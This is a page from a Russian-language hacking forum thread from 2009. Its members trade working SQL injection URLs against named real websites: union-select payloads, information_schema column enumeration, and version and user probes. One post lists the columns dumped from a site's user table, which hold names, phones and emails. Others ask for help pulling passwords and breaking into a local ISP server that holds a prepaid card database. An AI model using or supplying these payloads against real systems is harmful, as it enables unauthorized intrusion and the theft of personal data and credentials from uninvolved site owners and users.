24.02.2009, 19:33
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062
Репутация:
1550
|
|
Сообщение от Gorev
запрос перед тобой, вместо х ставь циферки Асчий... и читай про блинд скули
О, спс, про блинды не читал...
|
|
|
24.02.2009, 23:36
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
http://www.dnastar.com/support/FAQs1.php?faqid=-1
Не могу вытащить юзеров и пароли ихнее
а точнее вытащил из таблицы user
колонку username токо =\
дальше чет не могу так как все там перерыл
|
|
|
|
24.02.2009, 23:53
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
diznt, там при логине не пароль просят, а какой-то номер (Subscriber Number)
http://www.dnastar.com/support/FAQs1.php?faqid=-10+union+select+1,2,group_concat(column_name,0x2F, table_name),4,5,6+from+information_schema.columns+ where+column_name+like+'%num%'/*
ssnum/forms
может что-то из этого .. проверь на всякий случай.
2sabe
http://www.whimit.com/forum_read.php?f=17&id=75739+and+substring(version (),1,1)=4
версия 4.0. Подзапросов нет .. поковыряю еще насчет юниона
|
|
|
|
24.02.2009, 23:55
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
в таблице user такие колонки там
dnastar:user:LEADNUM
dnastar:user:FIRSTNAME
dnastar:user:LASTNAME
dnastar:user:INSTIT
dnastar:user:PHONE
dnastar:user:EMAIL
dnastar:user:NO_WEB_PRC
dnastar:user:EXEMPT
dnastar:user:datelogged
dnastar:user:username
dnastar:user:sp
dnastar:user:web_role
|
|
|
|
25.02.2009, 00:03
|
|
Познающий
Регистрация: 14.02.2009
Сообщений: 45
Провел на форуме:
96296
Репутация:
74
|
|
http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,2,3/* вроде инъекция... Но не выводит. Прошу помочь.
|
|
|
|
25.02.2009, 00:09
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.citycollege.ac.cy/link.php?id=-1+union+select+222,version(),1/*
|
|
|
|
25.02.2009, 00:09
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
http://www.citycollege.ac.cy/link.php?id=-211+union+select+1,concat_ws(0x3a,user(),version() ,database()),user()--
|
|
|
|
25.02.2009, 19:28
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
http://amxbans.snakearena.net/ban_details.php?bid=-1+union+select+1,2,3,4,5,6
вроде как инъекция, но ничего не выводит...
|
|
|
|
25.02.2009, 19:55
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
https://forum.antichat.ru/showpost.php?p=1108085&postcount=2
https://forum.antichat.ru/showpost.php?p=1108479&postcount=3
|
|
|
|
25.02.2009, 20:19
|
|
Новичок
Регистрация: 09.05.2006
Сообщений: 24
Провел на форуме:
168619
Репутация:
2
|
|
подскажите мне! у меня в сети есть сервак! через который сеть выходит в инет! на нем есть сайт статистики,вот я там полазил и нашёл такую штуку-в периоде с ...... по ..... если ставишь > то после поля даты появляется name=date_end> , а во втором окне если так же сделать,то будет name=date_beg>, а если поставить ' в самом поле периода вместо даты появляется вот так \' Так же доступно phpinfo.php
Что я могу тут сделать? я в php не оч шарю.И еще скажи мне если я через этот локальный сайт статистики ввожу карточку(которую покупаю для инета) он мне зачисляет на мой аккаунт деньги не выходя в нет! я вот думаю-значит бд карточек на серваке находится? или там другая система?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [JavaScript]](/avatars/avatar76873.jpg?1135515){kind=avatar}
Похожие темы
Комбинированный вид
